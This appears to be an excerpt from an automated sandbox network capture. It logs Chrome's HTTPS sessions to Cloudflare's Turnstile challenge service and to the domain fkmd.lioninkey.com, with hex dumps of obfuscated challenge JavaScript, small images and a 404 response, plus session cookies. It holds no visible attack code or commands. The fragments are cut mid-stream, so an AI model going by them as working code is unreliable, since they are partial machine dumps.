                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 62 51 78 72 71 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 54 66 67 6b 62 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 4e 59 79 4a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 4d 72 4b 4a 68 27 3a 67 52 28 31 33 38 37 29 2c 27 76 6a 76 4f 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 73 6d 61 59 51 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 46 71 55 72 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 61 66 56 73 66 27
                                                                                                                                                                                                                                                                                      Data Ascii: H,I){return G(H,I)},'bQxrq':function(G,H){return H===G},'Tfgkb':function(G,H){return G<H},'NYyJc':function(G,H){return G===H},'MrKJh':gR(1387),'vjvOk':function(G,H){return G(H)},'smaYQ':function(G,H){return H===G},'FqUrm':function(G,H){return G+H},'afVsf'
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 73 28 4e 2c 32 29 2c 63 74 28 4e 2c 31 33 29 29 5e 63 75 28 4e 2c 32 32 29 2c 50 3d 63 76 28 4e 2c 6f 5b 67 52 28 35 37 30 29 5d 28 63 78 26 49 5e 48 26 63 77 2c 48 26 49 29 29 2c 4e 3d 4d 2c 4d 3d 4c 2c 4c 3d 4b 2c 4b 3d 6f 5b 67 52 28 31 35 30 38 29 5d 28 63 79 2c 4a 2c 4f 29 2c 4a 3d 49 2c 49 3d 48 2c 48 3d 63 7a 2c 63 42 28 4f 2c 50 29 29 7d 62 77 5b 30 5d 3d 62 78 28 62 79 2c 62 7a 5b 30 5d 29 2c 62 41 5b 31 5d 3d 62 42 28 48 2c 62 43 5b 31 5d 29 2c 62 44 5b 32 5d 3d 6f 5b 67 52 28 37 30 38 29 5d 28 62 45 2c 49 2c 62 46 5b 32 5d 29 2c 62 47 5b 33 5d 3d 62 48 28 4a 2c 62 49 5b 33 5d 29 2c 62 4a 5b 34 5d 3d 6f 5b 67 52 28 36 37 31 29 5d 28 62 4b 2c 4b 2c 62 4c 5b 34 5d 29 2c 62 4d 5b 35 5d 3d 62 4e 28 4c 2c 62 4f 5b 35 5d 29 2c 62 50 5b 36 5d 3d 62 51
                                                                                                                                                                                                                                                                                      Data Ascii: s(N,2),ct(N,13))^cu(N,22),P=cv(N,o[gR(570)](cx&I^H&cw,H&I)),N=M,M=L,L=K,K=o[gR(1508)](cy,J,O),J=I,I=H,H=cz,cB(O,P))}bw[0]=bx(by,bz[0]),bA[1]=bB(H,bC[1]),bD[2]=o[gR(708)](bE,I,bF[2]),bG[3]=bH(J,bI[3]),bJ[4]=o[gR(671)](bK,K,bL[4]),bM[5]=bN(L,bO[5]),bP[6]=bQ
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 67 55 28 39 34 32 29 5d 28 31 36 30 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 6b 5b 67 55 28 31 36 33 29 5d 28 6b 5b 67 55 28 31 35 30 30 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 36 30 5d 5b 31 5d 5b 67 55 28 33 33 35 29 5d 28 74 68 69 73 2e 68 5b 31 36 30 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 31 35 30 29 2c 32 35 36 29 26 32 35 35 5e 32 30 2e 35 34 2c 74 68 69 73 2e 67 29 5d 2c 42 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 36 30 5d 5b 33 5d 5e 31 30 36 2b 74 68 69 73 2e 68 5b 31 36 30 2e 34 35 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 67 55 28 33 33 35 29 5d 28 74 68 69 73 2e 68 5b 31 36 30 2e 35 31 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 32 38 5e 34 37 2c 43 3d 5b 6e 75 6c 6c 5d 2c 44 3d 30 3b 6b 5b 67 55 28 39 34 37 29
                                                                                                                                                                                                                                                                                      Data Ascii: gU(942)](160,this.g)][3]^k[gU(163)](k[gU(1500)](this.h[this.g^160][1][gU(335)](this.h[160^this.g][0]++),150),256)&255^20.54,this.g)],B=this.h[this.g^160][3]^106+this.h[160.45^this.g][1][gU(335)](this.h[160.51^this.g][0]++)&255.28^47,C=[null],D=0;k[gU(947)
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 21 5b 5d 2c 65 4d 5b 68 55 28 31 34 31 33 29 5d 5b 68 55 28 32 34 30 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 55 28 31 35 33 39 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 55 28 34 33 31 29 5d 5b 68 55 28 38 35 34 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 55 28 32 31 35 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 55 28 34 33 31 29 5d 5b 68 55 28 38 32 34 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 55 28 34 33 31 29 5d 5b 68 55 28 31 33 32 35 29 5d 2c 27 63 6f 64 65 27 3a 68 55 28 38 35 37 29 2c 27 72 63 56 27 3a 65 4d 5b 68 55 28 34 33 31 29 5d 5b 68 55 28 31 36 36 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4c 28 33 32 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 56 2c 6a 2c 6b 2c 6c 2c 48 2c 6d
                                                                                                                                                                                                                                                                                      Data Ascii: ![],eM[hU(1413)][hU(240)]({'source':hU(1539),'widgetId':eM[hU(431)][hU(854)],'event':e[hU(215)],'cfChlOut':eM[hU(431)][hU(824)],'cfChlOutS':eM[hU(431)][hU(1325)],'code':hU(857),'rcV':eM[hU(431)][hU(166)]},'*'))},g)},eM[gL(323)]=function(g,h,i,hV,j,k,l,H,m
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 6b 5b 68 56 28 31 30 39 35 29 5d 2c 42 5b 68 56 28 31 33 36 32 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 68 56 28 39 34 35 29 5d 3d 32 35 30 30 2c 42 5b 68 56 28 38 30 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 68 56 28 31 31 37 32 29 5d 28 68 56 28 37 33 36 29 2c 68 56 28 31 33 32 36 29 29 2c 44 3d 7b 7d 2c 44 5b 68 56 28 31 31 39 39 29 5d 3d 67 2c 44 5b 68 56 28 32 32 35 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 68 56 28 39 32 35 29 5d 3d 6d 2c 44 5b 68 56 28 31 33 33 31 29 5d 3d 78 2c 45 3d 4a 53 4f 4e 5b 68 56 28 39 38 33 29 5d 28 44 29 2c 46 3d 67 4a 5b 68 56 28 31 34 31 38 29 5d 28 45 29 5b 68 56 28 35 31 38 29 5d 28 27 2b 27 2c 6b 5b 68 56 28 36 30 38 29 5d 29 2c 42 5b 68 56 28
                                                                                                                                                                                                                                                                                      Data Ascii: ))](),!B)return;C=k[hV(1095)],B[hV(1362)](C,o,!![]),B[hV(945)]=2500,B[hV(807)]=function(){},B[hV(1172)](hV(736),hV(1326)),D={},D[hV(1199)]=g,D[hV(225)]=l,D.cc=h,D[hV(925)]=m,D[hV(1331)]=x,E=JSON[hV(983)](D),F=gJ[hV(1418)](E)[hV(518)]('+',k[hV(608)]),B[hV(
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 21 3d 3d 6e 7d 2c 27 52 46 69 4c 78 27 3a 68 59 28 34 30 31 29 2c 27 66 57 58 63 52 27 3a 68 59 28 36 36 36 29 2c 27 59 56 63 79 50 27 3a 68 59 28 33 34 31 29 2c 27 7a 5a 53 41 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 50 69 6c 79 61 27 3a 68 59 28 31 33 34 33 29 2c 27 6f 79 61 68 5a 27 3a 68 59 28 31 34 30 37 29 2c 27 45 58 46 70 57 27 3a 68 59 28 31 30 30 33 29 7d 2c 6a 3d 64 5b 68 59 28 35 37 34 29 5d 28 29 2c 6b 3d 69 5b 68 59 28 37 34 31 29 5d 2c 6a 5b 68 59 28 36 34 39 29 5d 28 6b 29 3e 2d 31 29 3f 65 4d 5b 68 59 28 31 35 37 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 5a 29 7b 68 5a 3d 68 59 2c 69 5b 68 5a 28 36 33 30 29 5d 28 69 5b 68 5a 28
                                                                                                                                                                                                                                                                                      Data Ascii: ction(n,o){return o!==n},'RFiLx':hY(401),'fWXcR':hY(666),'YVcyP':hY(341),'zZSAn':function(n,o){return n===o},'Pilya':hY(1343),'oyahZ':hY(1407),'EXFpW':hY(1003)},j=d[hY(574)](),k=i[hY(741)],j[hY(649)](k)>-1)?eM[hY(1570)](function(hZ){hZ=hY,i[hZ(630)](i[hZ(
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC1369INData Raw: 64 5b 69 56 28 35 39 33 29 5d 28 65 5b 69 56 28 31 35 39 37 29 5d 2c 69 56 28 38 32 33 29 29 3f 67 62 3d 64 5b 69 56 28 33 30 33 29 5d 28 73 65 74 49 6e 74 65 72 76 61 6c 2c 66 75 6e 63 74 69 6f 6e 28 69 57 29 7b 69 57 3d 69 56 2c 64 5b 69 57 28 33 37 34 29 5d 28 67 45 29 7d 2c 31 65 33 29 3a 65 26 26 65 5b 69 56 28 39 32 35 29 5d 3d 3d 3d 69 56 28 31 35 33 39 29 26 26 65 5b 69 56 28 31 35 39 37 29 5d 3d 3d 3d 69 56 28 31 32 33 36 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 67 62 29 7d 29 2c 67 64 3d 21 5b 5d 2c 21 66 45 28 67 4c 28 31 35 35 32 29 29 26 26 28 67 45 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 6a 78 2c 63 2c 64 2c 65 29 7b 6a 78 3d 67 4c 2c 63 3d 7b 27 58 67 44 49 62 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29
                                                                                                                                                                                                                                                                                      Data Ascii: d[iV(593)](e[iV(1597)],iV(823))?gb=d[iV(303)](setInterval,function(iW){iW=iV,d[iW(374)](gE)},1e3):e&&e[iV(925)]===iV(1539)&&e[iV(1597)]===iV(1236)&&clearInterval(gb)}),gd=![],!fE(gL(1552))&&(gE(),setInterval(function(jx,c,d,e){jx=gL,c={'XgDIb':function(f)


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      14192.168.2.1649726104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d453c1ae94e08-MCI
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:48 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      15192.168.2.1649727104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:49 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:49 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:49 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d45411c6c68ff-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      16192.168.2.1649711188.114.96.34436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:49 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/6ysw/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6InJhYXArdXlCalZsZlhTd1N4eTNUOFE9PSIsInZhbHVlIjoicnlzNFNWN2RKRks0cHAvcHg0aVBBK2ZncnZBdzBKU09yeG5SVm0rZFc5ejJ0eVdBbEFjdFpjUWZXNCtVOWFOZ2ZURVB6OFlhdUVEcW5tdkhlUFVub2ptWDloYXM0ZGlVOVhOUFVUTWZSY1FublBMZndIK0NNdnNWMGZEQ2ZoQTMiLCJtYWMiOiI2ZWY3NjJlZWI3OTA2ZWViMGMyNTRjODE3MDIzOTYyNzQzMzgyNmEzMjcxY2ZhOTA5NTljNDEyNjY4ZDgxM2QyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkMyREpkMFVPTWR1aEI3bUZSMnc0NXc9PSIsInZhbHVlIjoiN215UFpuYzhHc05KZ1FZTWNKMU5YN1dNL2tWb1dXcmNaalJKckpDcys2MU53SVZiZmVRengwQmNGaVVYWmc5bWErQUpkT3QwVjlaMkVpNUxHbW1BYnR0dHpjTVlCWUdEcC9nVjA5UCtCSWVoTUZSNGUxdnJ5LzRzT0g1RG5vaksiLCJtYWMiOiJmYmFlMTk0NTg2MmE2Zjg5YjA0Yzk5MDM5M2JhNDJmNmFkZTY2ZGJkN2E4ZDQxMDdjM2M2YjhiYjlkMGZjM2JlIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:49 UTC1017INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:49 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                      Age: 11133
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTRaBsChwjRBmyPySqJSGlLkGakMO5bb1fDM0C389eXCBtQ2y0KY2F9mxlAWX%2Bf3%2FoeGcoTyl0Ce51v3WbSPXIL%2B4C7tO2zV0brwPFmaLkSALTsFL7o4fdXbyDKHxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2002&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2268&delivery_rate=1399710&cwnd=251&unsent_bytes=0&cid=20900f748b3c6a5d&ts=16&x=0"
                                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d45411b3ebfca-ATL
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=20108&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1898&delivery_rate=144022&cwnd=32&unsent_bytes=0&cid=de9af67cd5ab3c6e&ts=5325&x=0"
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      17192.168.2.1649728104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d45361ad96c58&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:50 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 121863
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4544d8f145fc-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                                                                                                                                                                                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22
                                                                                                                                                                                                                                                                                      Data Ascii: 0if%20the%20issue%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_feedback_description":"Send%20Feedback","turnstile_footer_privacy":"Privacy","turnstile_feedback_report":"Having%20trouble%3F","
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 36 38 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 38 38 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 39 32 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 36 35 35 29 29 2f 39 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 36 34 32 29 29 2f 31 30 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 31 35 36 30 31 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 35 37 39 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67 4c 2c 64 3d 7b 27 63 4a 77 77 4a 27 3a 67 4d 28 33 33 36 29 2c 27
                                                                                                                                                                                                                                                                                      Data Ascii: 68))/6+parseInt(gK(1488))/7*(-parseInt(gK(1092))/8)+parseInt(gK(655))/9*(parseInt(gK(642))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,115601),eM=this||self,eN=eM[gL(579)],eO=function(gM,d,e,f,g){return gM=gL,d={'cJwwJ':gM(336),'
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 63 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 46 62 75 55 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 76 53 52 63 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 62 65 48 75 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 72 6b 6a 74 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 49 55 44 49 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4f 6c 69 6e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 56 70 63 69 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c
